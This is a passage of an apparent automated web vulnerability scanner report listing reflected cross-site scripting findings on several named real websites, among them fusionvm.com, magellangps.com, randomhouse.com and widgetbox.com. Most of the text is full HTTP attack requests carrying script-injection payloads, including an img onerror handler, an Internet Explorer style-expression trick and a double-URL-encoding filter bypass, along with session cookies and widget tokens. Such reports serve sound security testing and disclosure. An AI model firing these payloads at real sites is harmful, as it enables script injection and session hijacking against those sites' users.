GET /FusionVM/DesktopModules/SecurityAdvisories/SecurityAdvisoriesView.aspx?Alias=www.fusionvm73dfb"-alert(1)-"905ea5234ca&TabId=0&Lang=en-US&OU=0&ItemId=35715 HTTP/1.1 Host: www.fusionvm.com Connection: keep-alive Referer: https://www.fusionvm.com/FusionVM/DesktopDefault.aspx User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=61526075.1303736107.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=61526075.1350494952.1303736107.1303736107.1303736107.1; ASPSESSIONIDQSSATBSQ=OACBHAADIBHEEHNBJFIKBAHA; CriticalWatch_WinMgmt=ee7a5594-6305-4caf-8e32-75811cf5c202; ASP.NET_SessionId=5nwmhdis5hnjwmmysd3y3vr0
The value of the Lang request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fd6ec"-alert(1)-"99c3d54552a was submitted in the Lang parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /FusionVM/DesktopModules/SecurityAdvisories/SecurityAdvisoriesView.aspx?Alias=www.fusionvm&TabId=0&Lang=en-USfd6ec"-alert(1)-"99c3d54552a&OU=0&ItemId=35715 HTTP/1.1 Host: www.fusionvm.com Connection: keep-alive Referer: https://www.fusionvm.com/FusionVM/DesktopDefault.aspx User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=61526075.1303736107.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=61526075.1350494952.1303736107.1303736107.1303736107.1; ASPSESSIONIDQSSATBSQ=OACBHAADIBHEEHNBJFIKBAHA; CriticalWatch_WinMgmt=ee7a5594-6305-4caf-8e32-75811cf5c202; ASP.NET_SessionId=5nwmhdis5hnjwmmysd3y3vr0
5.223. http://www.magellangps.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.magellangps.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload bb4e2%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25272dba5efe1c7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bb4e2'style='x:expression(alert(1))'2dba5efe1c7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
GET /?bb4e2%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25272dba5efe1c7=1 HTTP/1.1 Host: www.magellangps.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
5.224. http://www.magellangps.com/s.nl [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.magellangps.com
Path:
/s.nl
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 14994%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d346e0b5a0f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 14994'style='x:expression(alert(1))'d346e0b5a0f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
The value of the loc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 296c5"><script>alert(1)</script>422230dfc64 was submitted in the loc parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /cgi-bin/feedback/feedback.php?loc=http://www.randomhouse.com/296c5"><script>alert(1)</script>422230dfc64 HTTP/1.1 Host: www.randomhouse.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: RES_TRACKINGID=686529694590717; RES_SESSIONID=212207240983843; ResonanceSegment=1; __qca=P0-874375948-1303855562358; s_cc=true; SC_LINKS=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]
<html> <head> <title>Feedback for RandomHouse.com</title> <style type="text/css"> body { width: 500px; padding: 0; margin: 0; } #comments { background-color: #ddd; font-family: verdana, ar ...[SNIP]... <input type="hidden" name="referer" value="http://www.randomhouse.com/296c5"><script>alert(1)</script>422230dfc64"> ...[SNIP]...
5.226. http://www.randomhouse.com/cgi-bin/feedback/feedback.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.randomhouse.com
Path:
/cgi-bin/feedback/feedback.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5a11"><script>alert(1)</script>06c74c5b53b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /cgi-bin/feedback/feedback.php?loc=http://www.randomhouse.com/&b5a11"><script>alert(1)</script>06c74c5b53b=1 HTTP/1.1 Host: www.randomhouse.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: RES_TRACKINGID=686529694590717; RES_SESSIONID=212207240983843; ResonanceSegment=1; __qca=P0-874375948-1303855562358; s_cc=true; SC_LINKS=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]
The value of the cb request parameter is copied into the HTML document as plain text between tags. The payload 783b4<img%20src%3da%20onerror%3dalert(1)>1d40facd3aa was submitted in the cb parameter. This input was echoed as 783b4<img src=a onerror=alert(1)>1d40facd3aa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /ws/r2/Resonance.aspx?appid=randomhouse01&tk=686529694590717&ss=212207240983843&sg=1&pg=447216360829770&bx=true&vr=2.69&sc=cart_rr&ev=cart+display&ei=&ct=randomhousec01&no=4&cb=r1eh783b4<img%20src%3da%20onerror%3dalert(1)>1d40facd3aa&clk=&ur=http%3A//ecommerce.randomhouse.com/cart.do%3Ffrom%3Drandomhouse&plk=&rf= HTTP/1.1 Host: www.res-x.com Proxy-Connection: keep-alive Referer: http://ecommerce.randomhouse.com/cart.do?from=randomhouse User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=sy5xib45fjd4zxyswg3jzv45; NSC_wjq-Hspvq4=ffffffffc3a01e5345525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET P3P: CP="NOI DSP COR CUR PSA PSD OUR IND UNI" Date: Tue, 26 Apr 2011 22:09:46 GMT Content-Length: 2565
The value of the sc request parameter is copied into the HTML document as plain text between tags. The payload fe0e1<img%20src%3da%20onerror%3dalert(1)>1096c836d61 was submitted in the sc parameter. This input was echoed as fe0e1<img src=a onerror=alert(1)>1096c836d61 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /ws/r2/Resonance.aspx?appid=randomhouse01&tk=686529694590717&ss=212207240983843&sg=1&pg=447216360829770&bx=true&vr=2.69&sc=cart_rrfe0e1<img%20src%3da%20onerror%3dalert(1)>1096c836d61&ev=cart+display&ei=&ct=randomhousec01&no=4&cb=r1eh&clk=&ur=http%3A//ecommerce.randomhouse.com/cart.do%3Ffrom%3Drandomhouse&plk=&rf= HTTP/1.1 Host: www.res-x.com Proxy-Connection: keep-alive Referer: http://ecommerce.randomhouse.com/cart.do?from=randomhouse User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=sy5xib45fjd4zxyswg3jzv45; NSC_wjq-Hspvq4=ffffffffc3a01e5345525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET P3P: CP="NOI DSP COR CUR PSA PSD OUR IND UNI" Date: Tue, 26 Apr 2011 22:08:44 GMT Content-Length: 137
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 21e7b<img%20src%3da%20onerror%3dalert(1)>106cbf3251 was submitted in the REST URL parameter 2. This input was echoed as 21e7b<img src=a onerror=alert(1)>106cbf3251 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /CatalogFeed/Stats21e7b<img%20src%3da%20onerror%3dalert(1)>106cbf3251?callback=frontDoorStats HTTP/1.1 Host: www.widgetbox.com Proxy-Connection: keep-alive Referer: http://www.widgetbox.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=7A8F0F509BDEAD90EE48E43F3C535E7F; node=1025; __utmz=94870938.1303854385.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=94870938.1634222741.1303854385.1303854385.1303854385.1; __utmc=94870938; __utmb=94870938.2.10.1303854385
Response
HTTP/1.0 200 OK Date: Tue, 26 Apr 2011 21:46:28 GMT Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Set-Cookie: node=1025; path=/ Connection: close Content-Type: text/javascript
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 87793<script>alert(1)</script>1ab895c59aa was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /CatalogFeed/Stats?callback=frontDoorStats87793<script>alert(1)</script>1ab895c59aa HTTP/1.1 Host: www.widgetbox.com Proxy-Connection: keep-alive Referer: http://www.widgetbox.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=7A8F0F509BDEAD90EE48E43F3C535E7F; node=1025; __utmz=94870938.1303854385.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=94870938.1634222741.1303854385.1303854385.1303854385.1; __utmc=94870938; __utmb=94870938.2.10.1303854385
Response
HTTP/1.0 200 OK Date: Tue, 26 Apr 2011 21:46:17 GMT Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Set-Cookie: node=1025; path=/ Connection: close Content-Type: text/javascript
The value of the lib.mobileCssSrc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c95c"><script>alert(1)</script>87c8ce80013687705 was submitted in the lib.mobileCssSrc parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Request
GET /syndication/html5/3651dbe5-aec4-42b2-8270-d62db9a25bfe?widget.appId=3651dbe5-aec4-42b2-8270-d62db9a25bfe&widget.regId=6ba05ce8-62f3-46d0-bb21-b5f833b4817f&widget.friendlyId=msite-ext&widget.name=Mobile%20Web%20App&widget.token=34425cfc81ae44177f1d6c3dc87a11a7b3c559c30000012f8af78211&widget.sid=a421bc15422e4aa32fb9e2416e0bd7cc&widget.vid=a421bc15422e4aa32fb9e2416e0bd7cc&widget.id=0&widget.location=http%3A%2F%2Fwww.widgetbox.com%2Fmobile%2Fbuilder%2F&widget.timestamp=1303854400940&widget.serviceLevel=0&widget.provServiceLevel=2&widget.instServiceLevel=1&widget.width=320&widget.height=460&widget.wrapper=JAVASCRIPT&widget.isAdFriendly=false&widget.isAdEnabled=false&widget.adChannels=&widget.adPlacement=&widget.prototype=MOBILE_APP&widget.ua=mozilla%2F5.0%20%28windows%3B%20u%3B%20windows%20nt%206.1%3B%20en-us%29%20applewebkit%2F534.16%20%28khtml%2C%20like%20gecko%29%20chrome%2F10.0.648.205%20safari%2F534.16&widget.version=5&widget.output=htmlcontent&widget.appPK=145923021&widget.regPK=4248409&widget.providerPK=1860293&widget.userPK=67922830&siteConfig=%7B%22icon%22%3A%22%22%2C%22phoneIcon%22%3A%22%22%2C%22tabletIcon%22%3A%22%22%2C%22startupImg%22%3A%22%22%2C%22tabletStartupImg%22%3A%22%22%2C%22headerImg%22%3A%22%22%2C%22navStyle%22%3A%22bottomNav%22%2C%22aboutImg%22%3A%22%22%2C%22aboutText%22%3A%22Made+with+Widgetbox+Mobile.%22%2C%22titleStyle%22%3A%22siteTitleText%22%2C%22titleImg%3A%22%3A%22%22%2C%22themeColor%22%3A%22%22%2C%22theme%22%3A%2201%22%2C%22themeGuid%22%3A%226f55c53b-4089-4776-bcb9-135b52609c75%22%2C%22font%22%3A%7B%22primary%22%3A%22sans-serif%22%2C%22secondary%22%3A%22sans-serif%22%2C%22titleColor%22%3A%22%22%2C%22primaryColor%22%3A%22%22%2C%22secondaryColor%22%3A%22%22%2C%22title%22%3A%22sans-serif%22%7D%2C%22admobAcct%22%3A%22%22%2C%22showAds%22%3A%22false%22%2C%22showInstallTip%22%3A%22true%22%2C%22pageConfigs%22%3A%5B%5D%2C%22themeImage%22%3A%22%22%7D&vars=&lib.mobileCssSrc=%2Fmobile%2Fx%2Fcss%2Fpreview.css2c95c"><script>alert(1)</script>87c8ce80013687705&wbxPagePath=&pages=%5B%5D&isInstallable=true&pageIds=%5B%5D&wbxPageTitle=New+App&lib.mobileScriptSrc=%2Fmobilejs%2Fmapp_future.js&wbx_in_editor=%5Bobject+Object%5D&__cb=1303854400438&widget.appId=3651dbe5-aec4-42b2-8270-d62db9a25bfe&widget.regId=6ba05ce8-62f3-46d0-bb21-b5f833b4817f&widget.friendlyId=msite-ext&widget.name=Mobile+Web+App&widget.token=34425cfc81ae44177f1d6c3dc87a11a7b3c559c30000012f8af78211&widget.sid=a421bc15422e4aa32fb9e2416e0bd7cc&widget.vid=a421bc15422e4aa32fb9e2416e0bd7cc&widget.id=0&widget.location=http%3A%2F%2Fwww.widgetbox.com%2Fmobile%2Fbuilder%2F&widget.timestamp=1303854400940&widget.serviceLevel=0&widget.provServiceLevel=2&widget.instServiceLevel=1&widget.width=320&widget.height=460&widget.wrapper=JAVASCRIPT&widget.isAdFriendly=false&widget.isAdEnabled=false&widget.adChannels=&widget.adPlacement=&widget.prototype=MOBILE_APP&widget.ua=mozilla%2F5.0+%28windows%3B+u%3B+windows+nt+6.1%3B+en-us%29+applewebkit%2F534.16+%28khtml%2C+like+gecko%29+chrome%2F10.0.648.205+safari%2F534.16&widget.version=5&widget.output=htmlcontent&widget.appPK=145923021&widget.regPK=4248409&widget.providerPK=1860293&widget.userPK=67922830 HTTP/1.1 Host: www.widgetserver.com Proxy-Connection: keep-alive Cache-Control: max-age=0 Origin: http://www.widgetbox.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 21:48:23 GMT Server: Apache/2.2.3 (Red Hat) Expires: Sun, 7 May 1995 12:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache X-UA-Compatible: chrome=1 Vary: Accept-Encoding P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 15165
The value of the lib.mobileScriptSrc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a27f"><script>alert(1)</script>6e298833ab3d61a5d was submitted in the lib.mobileScriptSrc parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Request
GET /syndication/html5/3651dbe5-aec4-42b2-8270-d62db9a25bfe?widget.appId=3651dbe5-aec4-42b2-8270-d62db9a25bfe&widget.regId=6ba05ce8-62f3-46d0-bb21-b5f833b4817f&widget.friendlyId=msite-ext&widget.name=Mobile%20Web%20App&widget.token=34425cfc81ae44177f1d6c3dc87a11a7b3c559c30000012f8af78211&widget.sid=a421bc15422e4aa32fb9e2416e0bd7cc&widget.vid=a421bc15422e4aa32fb9e2416e0bd7cc&widget.id=0&widget.location=http%3A%2F%2Fwww.widgetbox.com%2Fmobile%2Fbuilder%2F&widget.timestamp=1303854400940&widget.serviceLevel=0&widget.provServiceLevel=2&widget.instServiceLevel=1&widget.width=320&widget.height=460&widget.wrapper=JAVASCRIPT&widget.isAdFriendly=false&widget.isAdEnabled=false&widget.adChannels=&widget.adPlacement=&widget.prototype=MOBILE_APP&widget.ua=mozilla%2F5.0%20%28windows%3B%20u%3B%20windows%20nt%206.1%3B%20en-us%29%20applewebkit%2F534.16%20%28khtml%2C%20like%20gecko%29%20chrome%2F10.0.648.205%20safari%2F534.16&widget.version=5&widget.output=htmlcontent&widget.appPK=145923021&widget.regPK=4248409&widget.providerPK=1860293&widget.userPK=67922830&siteConfig=%7B%22icon%22%3A%22%22%2C%22phoneIcon%22%3A%22%22%2C%22tabletIcon%22%3A%22%22%2C%22startupImg%22%3A%22%22%2C%22tabletStartupImg%22%3A%22%22%2C%22headerImg%22%3A%22%22%2C%22navStyle%22%3A%22bottomNav%22%2C%22aboutImg%22%3A%22%22%2C%22aboutText%22%3A%22Made+with+Widgetbox+Mobile.%22%2C%22titleStyle%22%3A%22siteTitleText%22%2C%22titleImg%3A%22%3A%22%22%2C%22themeColor%22%3A%22%22%2C%22theme%22%3A%2201%22%2C%22themeGuid%22%3A%226f55c53b-4089-4776-bcb9-135b52609c75%22%2C%22font%22%3A%7B%22primary%22%3A%22sans-serif%22%2C%22secondary%22%3A%22sans-serif%22%2C%22titleColor%22%3A%22%22%2C%22primaryColor%22%3A%22%22%2C%22secondaryColor%22%3A%22%22%2C%22title%22%3A%22sans-serif%22%7D%2C%22admobAcct%22%3A%22%22%2C%22showAds%22%3A%22false%22%2C%22showInstallTip%22%3A%22true%22%2C%22pageConfigs%22%3A%5B%5D%2C%22themeImage%22%3A%22%22%7D&vars=&lib.mobileCssSrc=%2Fmobile%2Fx%2Fcss%2Fpreview.css&wbxPagePath=&pages=%5B%5D&isInstallable=true&pageIds=%5B%5D&wbxPageTitle=New+App&lib.mobileScriptSrc=%2Fmobilejs%2Fmapp_future.js1a27f"><script>alert(1)</script>6e298833ab3d61a5d&wbx_in_editor=%5Bobject+Object%5D&__cb=1303854400438&widget.appId=3651dbe5-aec4-42b2-8270-d62db9a25bfe&widget.regId=6ba05ce8-62f3-46d0-bb21-b5f833b4817f&widget.friendlyId=msite-ext&widget.name=Mobile+Web+App&widget.token=34425cfc81ae44177f1d6c3dc87a11a7b3c559c30000012f8af78211&widget.sid=a421bc15422e4aa32fb9e2416e0bd7cc&widget.vid=a421bc15422e4aa32fb9e2416e0bd7cc&widget.id=0&widget.location=http%3A%2F%2Fwww.widgetbox.com%2Fmobile%2Fbuilder%2F&widget.timestamp=1303854400940&widget.serviceLevel=0&widget.provServiceLevel=2&widget.instServiceLevel=1&widget.width=320&widget.height=460&widget.wrapper=JAVASCRIPT&widget.isAdFriendly=false&widget.isAdEnabled=false&widget.adChannels=&widget.adPlacement=&widget.prototype=MOBILE_APP&widget.ua=mozilla%2F5.0+%28windows%3B+u%3B+windows+nt+6.1%3B+en-us%29+applewebkit%2F534.16+%28khtml%2C+like+gecko%29+chrome%2F10.0.648.205+safari%2F534.16&widget.version=5&widget.output=htmlcontent&widget.appPK=145923021&widget.regPK=4248409&widget.providerPK=1860293&widget.userPK=67922830 HTTP/1.1 Host: www.widgetserver.com Proxy-Connection: keep-alive Cache-Control: max-age=0 Origin: http://www.widgetbox.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 21:48:30 GMT Server: Apache/2.2.3 (Red Hat) Expires: Sun, 7 May 1995 12:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache X-UA-Compatible: chrome=1 Vary: Accept-Encoding P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 15165
The value of the pages request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 4dfe5%3balert(1)//bec5e8a4925e26aae was submitted in the pages parameter. This input was echoed as 4dfe5;alert(1)//bec5e8a4925e26aae in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Request
GET /syndication/html5/3651dbe5-aec4-42b2-8270-d62db9a25bfe?widget.appId=3651dbe5-aec4-42b2-8270-d62db9a25bfe&widget.regId=6ba05ce8-62f3-46d0-bb21-b5f833b4817f&widget.friendlyId=msite-ext&widget.name=Mobile%20Web%20App&widget.token=34425cfc81ae44177f1d6c3dc87a11a7b3c559c30000012f8af78211&widget.sid=a421bc15422e4aa32fb9e2416e0bd7cc&widget.vid=a421bc15422e4aa32fb9e2416e0bd7cc&widget.id=0&widget.location=http%3A%2F%2Fwww.widgetbox.com%2Fmobile%2Fbuilder%2F&widget.timestamp=1303854400940&widget.serviceLevel=0&widget.provServiceLevel=2&widget.instServiceLevel=1&widget.width=320&widget.height=460&widget.wrapper=JAVASCRIPT&widget.isAdFriendly=false&widget.isAdEnabled=false&widget.adChannels=&widget.adPlacement=&widget.prototype=MOBILE_APP&widget.ua=mozilla%2F5.0%20%28windows%3B%20u%3B%20windows%20nt%206.1%3B%20en-us%29%20applewebkit%2F534.16%20%28khtml%2C%20like%20gecko%29%20chrome%2F10.0.648.205%20safari%2F534.16&widget.version=5&widget.output=htmlcontent&widget.appPK=145923021&widget.regPK=4248409&widget.providerPK=1860293&widget.userPK=67922830&siteConfig=%7B%22icon%22%3A%22%22%2C%22phoneIcon%22%3A%22%22%2C%22tabletIcon%22%3A%22%22%2C%22startupImg%22%3A%22%22%2C%22tabletStartupImg%22%3A%22%22%2C%22headerImg%22%3A%22%22%2C%22navStyle%22%3A%22bottomNav%22%2C%22aboutImg%22%3A%22%22%2C%22aboutText%22%3A%22Made+with+Widgetbox+Mobile.%22%2C%22titleStyle%22%3A%22siteTitleText%22%2C%22titleImg%3A%22%3A%22%22%2C%22themeColor%22%3A%22%22%2C%22theme%22%3A%2201%22%2C%22themeGuid%22%3A%226f55c53b-4089-4776-bcb9-135b52609c75%22%2C%22font%22%3A%7B%22primary%22%3A%22sans-serif%22%2C%22secondary%22%3A%22sans-serif%22%2C%22titleColor%22%3A%22%22%2C%22primaryColor%22%3A%22%22%2C%22secondaryColor%22%3A%22%22%2C%22title%22%3A%22sans-serif%22%7D%2C%22admobAcct%22%3A%22%22%2C%22showAds%22%3A%22false%22%2C%22showInstallTip%22%3A%22true%22%2C%22pageConfigs%22%3A%5B%5D%2C%22themeImage%22%3A%22%22%7D&vars=&lib.mobileCssSrc=%2Fmobile%2Fx%2Fcss%2Fpreview.css&wbxPagePath=&pages=%5B%5D4dfe5%3balert(1)//bec5e8a4925e26aae&isInstallable=true&pageIds=%5B%5D&wbxPageTitle=New+App&lib.mobileScriptSrc=%2Fmobilejs%2Fmapp_future.js&wbx_in_editor=%5Bobject+Object%5D&__cb=1303854400438&widget.appId=3651dbe5-aec4-42b2-8270-d62db9a25bfe&widget.regId=6ba05ce8-62f3-46d0-bb21-b5f833b4817f&widget.friendlyId=msite-ext&widget.name=Mobile+Web+App&widget.token=34425cfc81ae44177f1d6c3dc87a11a7b3c559c30000012f8af78211&widget.sid=a421bc15422e4aa32fb9e2416e0bd7cc&widget.vid=a421bc15422e4aa32fb9e2416e0bd7cc&widget.id=0&widget.location=http%3A%2F%2Fwww.widgetbox.com%2Fmobile%2Fbuilder%2F&widget.timestamp=1303854400940&widget.serviceLevel=0&widget.provServiceLevel=2&widget.instServiceLevel=1&widget.width=320&widget.height=460&widget.wrapper=JAVASCRIPT&widget.isAdFriendly=false&widget.isAdEnabled=false&widget.adChannels=&widget.adPlacement=&widget.prototype=MOBILE_APP&widget.ua=mozilla%2F5.0+%28windows%3B+u%3B+windows+nt+6.1%3B+en-us%29+applewebkit%2F534.16+%28khtml%2C+like+gecko%29+chrome%2F10.0.648.205+safari%2F534.16&widget.version=5&widget.output=htmlcontent&widget.appPK=145923021&widget.regPK=4248409&widget.providerPK=1860293&widget.userPK=67922830 HTTP/1.1 Host: www.widgetserver.com Proxy-Connection: keep-alive Cache-Control: max-age=0 Origin: http://www.widgetbox.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
